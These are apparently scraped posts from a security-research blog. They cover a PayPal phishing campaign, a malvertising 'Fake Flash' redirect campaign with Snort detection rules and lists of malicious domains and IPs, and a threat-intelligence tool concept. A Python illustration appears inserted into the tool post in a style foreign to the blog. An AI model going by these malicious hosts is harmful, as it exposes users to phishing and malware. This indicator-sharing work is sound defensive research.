<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/satumilyar</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">1.googleincsafe<span style="white-space: normal;">[.]</span>org/brinjilan</span></span></div>
<div>
<br /></div>
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>DeepEnd Research has already notified Apple and PayPal of these findings prior to the publication of this post.</b></span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><b><u>7/27 - Update:</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><b><u><br /></u></b></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since the publication of our blog post the Twitter accounts we found along with the </span><span style="font-family: "arial" , "helvetica" , sans-serif;">associated </span><span style="font-family: "arial" , "helvetica" , sans-serif;">YouTube </span><span style="font-family: "arial" , "helvetica" , sans-serif;">account </span><span style="font-family: "arial" , "helvetica" , sans-serif;">have been suspended from each respected platform.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">During this time we were also continuing to monitor for any renewed activity by any new users possibly using the same methods outlined in this campaign, since the identified ones were suspended.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">We managed to find that there is currently one newly registered Twitter user still using the same construct of various shortened links leading to PayPal login phishing pages:</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br />This user is registered under the name 'Tanya D Campero' - https://twitter.com/CamperoTanya </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><u>The links tweeted out by this user lead us to the following new websites and infrastructure used by this campaign:</u></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">iiri[.]ir/MtgOi</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">x[.]co/6nJpF </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">x[.]co/cuents8592</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">sku[.]su/bZUVw</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">pavpal[.]com-appverifyaccount[.]me</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-webappsactivityaccount[.]</span><span style="font-family: "arial" , "helvetica" , sans-serif;">support</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-appaccountverify[.]me</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">162.144.78[.]12</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-verifyidseed[.]net</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-accounts-verification[.]online</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-disputeaccount[.]me</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">22027bb7a536c4631d05950c052600da4e4e6b697c0ffee2189da38e05857466</span></div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
</div>
Andrei Kornevhttp://www.blogger.com/profile/11381063307200503085noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-18015918082331351182018-06-24T12:27:00.000-04:002018-06-24T12:35:43.098-04:00HOARD Concept Release<!--StartFragment-->
<br />
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;">Introducing
"Historical Observations of Actionable Reputation Data" (HOARD) - a
new proof of concept that we've designed to help security defenders utilize
Threat Intelligence (Observable and Indicator data) in new ways. We understand
that there are a number of ways to address this challenge. The goal is not to
come up with the next "Product X" - but to bring awareness to another
use of threat intelligence (or reputation data). </span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;">Observable data is
frequently identified by computer security devices, intrusion detection
systems, and forensic investigators following an intrusion or other malicious
event. When observable data is paired with contextual information it becomes an
indicator. Indicators are usually given a reputation or risk score.</span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">These Indicators are frequently classified with
the industry term "threat Intelligence" and disseminated by both
humans and machines to alert computer security teams about threats they may
have been previously unaware of.<span style="mso-spacerun: yes;"> </span>STIX is
a standard that is commonly used to communicate this type of data and inject it
into security device pipelines. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Many computer security technologies will import
this threat intelligence data and match it with same type observables. This has
been done through Security Incident and Event Monitoring (SIEM) solutions,
antivirus and network or system level intrusion detection systems.
Unfortunately, most of this searching is forward focused.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">The issue with forward focused analysis of
indicators is the ephemeral nature.<span style="mso-spacerun: yes;"> </span>Once
identified, an adversary may change their attack profile and in doing so they
change the identified observables. This asserts that even the fastest sharing
platforms are likely to become less effective in the hours to days following
the initial discovery of a given observable.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">HOARD aims to reduce the speed and storage
limitations needed for quickly matching observable data with historical
threats.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Once installed, the HOARD application will
monitor log events in real time by monitoring a queuing system (Currently
Redis) fed by RSYSLOG, Suricata or other technologies. Since context is not
required for the initial searches, the application extracts and stores only the
observable data identified by the analyst as being relevant. This immediately
reduces the data stored to a manageable size and provides raw data that can be
indexed in a probabilistic data structure known as sketches or Cuckoo Filters.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Once observable data has been added to a threat
intelligence exchange platform or a security team has been alerted to an
issue,<span style="mso-spacerun: yes;"> </span>a second application can be
utilized to rapidly search back in time by querying the sketches to determine
if the observable was probably seen in the past. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">When a probabilistic match has been identified,
the organizations Security Incident and Event Monitor (SIEM) is queried using
the file date and timestamp information, this second query is used to validate
the hit and provide context. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Keeping in mind cuckoo filters are
probabilistic in nature, there will be false positives, but never false
negatives. This rapid searching capability should be used to narrow down the
potential timeframes at issue rather than relying on trigram or full context
searches through an already taxed SIEM product. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Furthermore, these cuckoo filters/sketches can
be provided to external organizations such as MSSPs, Incident Responders or Law
Enforcement without exposing any organization or sensitive data. </span></div>
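The workflow described above (extract only the analyst-chosen observables from a log stream, sketch them in a cuckoo filter, later hunt for a new indicator and confirm any probable hit against the full logs) as an added illustration. This is not the HOARD project's own code: the rsyslog-style log lines are constructed, the extractor is deliberately limited to IPv4 addresses and DNS names, and the filter sizes, the sha256-based hashing and the small overflow list that preserves the no-false-negative guarantee when the table fills up are all choices made for this example.

```python
# Added example of the HOARD workflow, not the project's code. The log lines,
# extractor and cuckoo filter below are constructed for illustration.
import hashlib
import random
import re

# Constructed rsyslog-style sample lines (not real traffic).
SAMPLE_LOGS = [
    "Jun 20 10:01:02 fw01 kernel: ACCEPT SRC=10.0.0.5 DST=198.51.100.23 DPT=443",
    "Jun 20 10:01:09 dns01 named: client 10.0.0.5#51234: query: update.example-cdn.net IN A +",
    "Jun 20 10:02:44 proxy01 squid: 10.0.0.7 TCP_MISS/200 GET http://files.example.org/setup HTTP/1.1",
    "Jun 20 10:05:31 fw01 kernel: DROP SRC=203.0.113.77 DST=10.0.0.5 DPT=22",
]

# Deliberately simple extractor: only IPv4 addresses and DNS names are kept,
# standing in for "the observable data identified by the analyst as relevant".
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def extract_observables(line):
    """Return the set of observables in one log line, lower-cased for matching."""
    text = line.lower()
    return set(IPV4_RE.findall(text)) | set(DOMAIN_RE.findall(text))


class CuckooFilter:
    """Partial-key cuckoo filter. Only short fingerprints are stored, which is
    why the finished sketch can be handed to a third party without the logs."""

    def __init__(self, num_buckets=1024, bucket_size=4, fp_bits=32, max_kicks=500):
        if num_buckets & (num_buckets - 1):
            raise ValueError("num_buckets must be a power of two")
        self.num_buckets, self.bucket_size, self.max_kicks = num_buckets, bucket_size, max_kicks
        self.fp_mask = (1 << fp_bits) - 1  # fewer bits: smaller sketch, more false positives
        self.buckets = [[] for _ in range(num_buckets)]
        self.overflow = []  # fingerprints that could not be placed, so no item is ever lost
        self.count = 0

    def _fingerprint(self, item):
        h = hashlib.sha256(b"fp:" + item.encode()).digest()
        return (int.from_bytes(h[:4], "big") & self.fp_mask) or 1  # never 0

    def _index(self, item):
        h = hashlib.sha256(b"idx:" + item.encode()).digest()
        return int.from_bytes(h[:4], "big") & (self.num_buckets - 1)

    def _alt_index(self, index, fp):
        # i2 = i1 XOR hash(fp); applying it again yields i1, so a lookup can find
        # the partner bucket from the fingerprint alone.
        h = hashlib.sha256(fp.to_bytes(4, "big")).digest()
        return (index ^ int.from_bytes(h[:4], "big")) & (self.num_buckets - 1)

    def insert(self, item):
        fp = self._fingerprint(item)
        i1 = self._index(item)
        i2 = self._alt_index(i1, fp)
        self.count += 1
        for i in (i1, i2):
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        i = random.choice((i1, i2))  # both full: evict a resident and relocate it
        for _ in range(self.max_kicks):
            j = random.randrange(self.bucket_size)
            fp, self.buckets[i][j] = self.buckets[i][j], fp
            i = self._alt_index(i, fp)
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        self.overflow.append(fp)  # table too full; in practice rebuild a larger filter
        return False

    def contains(self, item):
        """True if item was probably inserted; never False for an inserted item."""
        fp = self._fingerprint(item)
        i1 = self._index(item)
        i2 = self._alt_index(i1, fp)
        return fp in self.buckets[i1] or fp in self.buckets[i2] or fp in self.overflow


def build_filter(lines):
    """Stream lines through the extractor and sketch only the observables."""
    cf = CuckooFilter()
    for line in lines:
        for obs in extract_observables(line):
            if not cf.contains(obs):  # skip fingerprints already present
                cf.insert(obs)
    return cf


def hunt(cf, indicators):
    """Cheap first pass: which new indicators were probably seen in the past?"""
    return [ioc for ioc in indicators if cf.contains(ioc.lower())]


def validate_hit(lines, indicator):
    """Second pass, standing in for the SIEM query that confirms and adds context."""
    return [line for line in lines if indicator.lower() in line.lower()]
```

Running `hunt(build_filter(SAMPLE_LOGS), ["203.0.113.77", "evil.example.com"])` flags only the address that actually appeared, and `validate_hit` then pulls the matching raw line the way the follow-up SIEM query would. Shrinking `fp_bits` makes the sketch smaller at the cost of more false positives; the `overflow` list is what keeps an overfull filter from ever returning a false negative.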
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">HOARD is open source, GPLv3. We are releasing
our operational POC in hopes that it will spark ideas and discussion among the
security community. Our goal is implementation in a wide variety of products to
continue to advance the future of threat intelligence and behavior or
reputation matching on observable data.<span style="mso-spacerun: yes;"> </span></span></div>
<div style="margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="font-size: 12.0pt;">Please head on over to our GitHub repo (</span><a href="https://github.com/deependresearch/hoard"><span style="font-size: 11.0pt;">https://github.com/deependresearch/hoard</span></a><span style="font-size: 11.0pt;">)</span><span style="font-size: 12.0pt;"> to take a look at our POC. </span></span></div>
<!--EndFragment--><br />Anonymoushttp://www.blogger.com/profile/06184797257846704907noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-4526877325835571262018-02-20T16:07:00.000-05:002018-02-20T16:07:04.506-05:00YAFF - Yet Another Fake Flash campaign<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b><u>By Andre' DiMino and Mila Parkour</u></b><br />
<br />
At this point in Internet history, the prevalence of "Fake Flash" sites is certainly nothing new.<br />
These Fake Flash sites attempt to trick a user into installing what they believe is an update to Adobe Flash. In reality, this "update" is a malicious payload that will compromise their computer.<br />
<br />
A typical Fake Flash infection involves a malicious or compromised web site or embedded advertisement that redirects the user to a page indicating that the user's Adobe Flash player is out of date.<br />
In some cases, there is a series of several redirects before the user reaches the final landing page.<br />
This landing page is typically some variation of Figure 1 below.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwk8FZk8eYmTyMZl5W9h2-je_c59WBgnJ3bhGYz20SQ0C5SO2OXUW472aCUy1ojfTgOXrExcaj4aKKtqmG9RczVH1MSKrqqobZhVjker23E62AWOJFHkLTJRqlgZS8vGcit9uesRIB27k/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="862" data-original-width="1193" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwk8FZk8eYmTyMZl5W9h2-je_c59WBgnJ3bhGYz20SQ0C5SO2OXUW472aCUy1ojfTgOXrExcaj4aKKtqmG9RczVH1MSKrqqobZhVjker23E62AWOJFHkLTJRqlgZS8vGcit9uesRIB27k/s640/2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Typical Fake Flash update page</td></tr>
</tbody></table>
<br />
<br />
The trusting user (who is super eager to watch their Flash content) then clicks the update link, at which point the malware is downloaded to the user's computer. Many varieties of malware, including ransomware and banking trojans, have been delivered this way.<br />
Most Fake Flash campaigns are initiated via advertising networks on sites that require Flash to view their content, such as streaming movie sites and online games.<br />
<br />
So while we don't want to rehash old news and analysis of Fake Flash, we do wish to raise awareness of a very aggressive Fake Flash/malvertising campaign.<br />
We also wish to provide some IOCs associated with this campaign.<br />
<br />
A heavy wave of Fake Flash redirects appeared on our radar: literally hundreds of redirects were seen from assorted domains, all with similar network traffic patterns.<br />
Almost all of these were associated with advertising redirects from online video streaming sites.<br />
The landing pages for these redirects were seen as either fake Flash, Amazon gift card, or other malvertising-type sites.<br />
<br />
Tracing back the network traffic from the Fake Flash landing pages provided information on the redirections.<br />
For example, the following images represent a typical redirection chain that we observed.<br />
We are using <a href="https://github.com/omriher/CapTipper" target="_blank">CapTipper</a> to present the HTTP sessions for the images.<br />
Starting from the landing page and working up the chain:<br />
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_AbvXcpQ7t28lIQIZX1Rp4jZ_Eg_f1E0VFOYxOQK_rBWuz1Tp8Y7_E0sEjItJ9myYw0pUBxI9Y2RzjrFlQKstOy1Tit27gbR7nQHR4OwwQ3yiZ3FHwwfd6uQYt3vh8nmckXym8W2S1ak/s1600/srv79.admedit.net_redirect_3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="804" data-original-width="1600" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_AbvXcpQ7t28lIQIZX1Rp4jZ_Eg_f1E0VFOYxOQK_rBWuz1Tp8Y7_E0sEjItJ9myYw0pUBxI9Y2RzjrFlQKstOy1Tit27gbR7nQHR4OwwQ3yiZ3FHwwfd6uQYt3vh8nmckXym8W2S1ak/s640/srv79.admedit.net_redirect_3.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Landing page for one redirect chain observed.</td></tr>
</tbody></table>
<br />
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFLSqpNYl9K8N0uNBgdAJ9GgncsemKggAGLhcbeJyFPTdp3Dyh5URGwDheRSr4gvbTQ4GkmRCc_BVoCvrBk7rTkPDFP96zJsY-q8n1jfrGcdObtDJmQyzXagYXQOi5hUuhQMfizh7pj4/s1600/srv79.admedit.net_redirect_2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="632" data-original-width="1600" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFLSqpNYl9K8N0uNBgdAJ9GgncsemKggAGLhcbeJyFPTdp3Dyh5URGwDheRSr4gvbTQ4GkmRCc_BVoCvrBk7rTkPDFP96zJsY-q8n1jfrGcdObtDJmQyzXagYXQOi5hUuhQMfizh7pj4/s640/srv79.admedit.net_redirect_2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Second redirect</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFFI4Ly26wshO55xijAs4HrBj53MbAS4McYNn58_d-BsE8AYDu41JtSWm2K4Rr2NbcjUHiBGif3cR6CZESqBOH7YB7kwaaiYrZHoWLt_Uc9Gm_M_MKij7hxg6Gjm3ucDuR6psQXMoFA8/s1600/srv79.admedit.net_redirect_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="619" data-original-width="1600" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFFI4Ly26wshO55xijAs4HrBj53MbAS4McYNn58_d-BsE8AYDu41JtSWm2K4Rr2NbcjUHiBGif3cR6CZESqBOH7YB7kwaaiYrZHoWLt_Uc9Gm_M_MKij7hxg6Gjm3ucDuR6psQXMoFA8/s640/srv79.admedit.net_redirect_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First redirect</td></tr>
</tbody></table>
<br />
<div>
Again tracing backward through all the network traffic, piecing together all the redirects and HTTP <a href="https://en.wikipedia.org/wiki/HTTP_referer" target="_blank">referer</a> fields, we observed what appears to be the source for these malvertising redirects.</div>
<div>
<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY7FZePtyi74sJC1J5sX59zBFknpzCZgQc_PAl4g979U1Gt3VX6ZeZeZ968D8Sei8vE7XPG-sqGt-3_Ij_XRLjx_By7ivgtHRnKViCHGGiYTsHcFlnxdZDYDyEc0uWjxXQOgrnkIauvEg/s1600/adsb4track.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="747" data-original-width="1600" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY7FZePtyi74sJC1J5sX59zBFknpzCZgQc_PAl4g979U1Gt3VX6ZeZeZ968D8Sei8vE7XPG-sqGt-3_Ij_XRLjx_By7ivgtHRnKViCHGGiYTsHcFlnxdZDYDyEc0uWjxXQOgrnkIauvEg/s640/adsb4track.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
Note that a video from a streaming video website was the Referer in a GET request to jwljj.adsb4track[.]com. In almost every instance that we looked at, jwljj.adsb4track[.]com would redirect the browser to one of several domains. In the example above, the user was directed to srv79.admedit[.]net, which then continued the redirection as seen in the "First redirect" image above.</div>
<div>
<br />
Other initial redirect domains seen are listed below.<br />
<br /></div>
<div>
We also noted that for browsing sessions that were not redirected to a fake flash site, the redirection was sent to a page on the domain bestabid[.]com. This page would redirect the browser to some malvertising, phish, or other traffic monetizing site.<br />
<br />
For example, one redirect to the bestabid[.]com page yielded this HTML code:</div>
<div>
<br /></div>
</div>
<div>
<a href="http://files.deependresearch.org/resources/7fr0zswemk32_bestabid.txt" target="_blank">Example of flash detect and redirect from bestabid[.]com</a><br />
Note the tracking beacons at<br />mt.rtmark[.]net and my.rtmark[.]net<br />
<br /></div>
<div>
So since we've seen so many of these, we thought it would just be best to post some Snort signatures and IOCs associated with this campaign.<br />
<div>
<br /></div>
<div>
<b><u>Snort Signatures</u></b></div>
<div>
<br />
The following Snort signatures will help detect the redirects seen in this campaign.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"BestaBid FakeFlash Redirect 1"; content:"Location"; http_header; fast_pattern:only; content:"302"; http_stat_code; pcre:"/\/\?pcl=[a-zA-Z0-9_-]{86}\x2E\x2E\&cid=/i"; classtype:unknown; sid:xxxxx; rev:1; )</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"BestaBid FakeFlash Redirect 2"; content:"Location"; http_header; fast_pattern:only; content:"302"; http_stat_code; pcre:"/\/\?pcl=[a-zA-Z0-9_-]{43}\x2E\&cid=/xxi"; classtype:unknown; sid:xxxxx; rev:1; )</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<b><u>Initial Redirect Domains & IP addresses</u></b><br />
<br />
<a href="http://files.deependresearch.org/resources/7si9439_34.194.20.115.txt" target="_blank">jwljj.adsb4track[.]com - 34.194.20.115 - Amazon AWS</a><br />
<a href="http://files.deependresearch.org/resources/9b59a20_54.164.252.255.txt" target="_blank">winclicks[.]info - 54.164.252.255 - Amazon AWS</a><br />
<br />
<b><u>Secondary Redirects</u></b><br />
<b><u><br /></u></b>
<a href="http://files.deependresearch.org/resources/y73nc02_212.129.56.50.txt" target="_blank">212.129.56.50 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/9de48bt_195.154.102.90.txt" target="_blank">195.154.102.90 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/77vr4mu_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/r90s38n_34.236.112.82.txt" target="_blank">34.236.112.82 - Amazon AWS</a><br />
<a href="http://files.deependresearch.org/resources/42mfpoe_5.8.35.154.txt" target="_blank">5.8.35.154 - LLHost Inc</a><br />
<a href="http://files.deependresearch.org/resources/aqplor5_163.172.21.184.txt" target="_blank">163.172.21.184 - - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/vo58s20_5.39.223.144.txt" target="_blank">5.39.223.144 - Hostkey B.V</a><br />
<a href="http://files.deependresearch.org/resources/653nto9_5.39.223.145.txt" target="_blank">5.39.223.145 - Hostkey B.V</a><br />
<a href="http://files.deependresearch.org/resources/v954n22_162.255.117.132.txt" target="_blank">162.255.117.132 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/58sw20m_163.172.113.205.txt" target="_blank">163.172.113.205 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/c9550xp_163.172.197.138.txt" target="_blank">163.172.197.138 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/v9440hi_163.172.197.160.txt" target="_blank">163.172.197.160 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/xo9x48v_195.154.44.206.txt" target="_blank">195.154.44.206 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ngtguup_198.187.28.7.txt" target="_blank">198.187.28.7 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/ngtludn_212.83.133.129.txt" target="_blank">212.83.133.129 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ngtraad_212.83.137.0.txt" target="_blank">212.83.137.0 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/773nxp9_212.129.49.120.txt" target="_blank">212.129.49.120 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/45bt8sw_212.129.50.104.txt" target="_blank">212.129.50.104 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/zwebc98_212.129.51.188.txt" target="_blank">212.129.51.188 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/678de3m_212.129.53.8.txt" target="_blank">212.129.53.8 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/112nt9v_212.129.53.77.txt" target="_blank">212.129.53.77 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/c9ir57n_212.129.54.29.txt" target="_blank">212.129.54.29 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/sxrb755_212.129.56.97.txt" target="_blank">212.129.56.97 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/5900mro_212.129.56.205.txt" target="_blank">212.129.56.205 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/2600kwl_212.129.62.255.txt" target="_blank">212.129.62.255 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/29de48b_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ightyft_162.255.117.134.txt" target="_blank">162.255.117.134 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/oltyol8_212.83.133.112.txt" target="_blank">212.83.133.112 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/edruju4_163.172.199.130.txt" target="_blank">163.172.199.130 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/x475ntg_212.83.167.169.txt" target="_blank">212.83.167.169 - Iliad / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/787nfru_163.172.198.43.txt" target="_blank">163.172.198.43 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/3edc90g_163.172.198.44.txt" target="_blank">163.172.198.44 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/48i8l90_163.172.81.70.txt" target="_blank">163.172.81.70 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/hgjt85m_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/209crrfp_162.255.117.134.txt" target="_blank">162.255.117.134 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/10m0qsi_195.154.49.202.txt" target="_blank">195.154.49.202 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ve9a28v_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/d458cv0_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
185.176.192.107 - Histate Global<br />
<br />
<b><u>Redirects to landing pages</u></b><br />
<br />
The landing page redirects were seen hosted on:<br />
<br />
<a href="http://files.deependresearch.org/resources/10m0qsi_195.154.49.202.txt" target="_blank">195.154.49.202 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ve9a28v_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/d458cv0_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<br />
<br />
<b><u>Passive DNS</u></b><br />
<i><a href="https://help.passivetotal.org/passive_dns.html" target="_blank">Passive DNS</a> information courtesy of <a href="https://www.farsightsecurity.com/" target="_blank">Farsight Security, Inc.</a></i><br />
<br />
We've identified many thousands of domains associated with this campaign.<br />The passive DNS results linked above give a good indication of the scope and scale of the infrastructure used in this campaign.<br />
<br />
Click the above links for a text file containing the Passive DNS information for the listed IP addresses.<br />
<br />
<div style="text-align: center;">
<u>Many thanks to Andrei Kornev for his research assistance.</u></div>
<br /></div>
</div>
</div>
<i>Posted by <a href="http://www.blogger.com/profile/07255414624107506662">Andre M. DiMino</a></i><br />
<br />
<h2 style="text-align: left;">Analysis of Trump's secret server story</h2>
<i>Published 2017-03-20, last updated 2018-09-05</i><div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
</div>
<h3 style="text-align: left;">
The debunkings will continue...</h3>
<div>
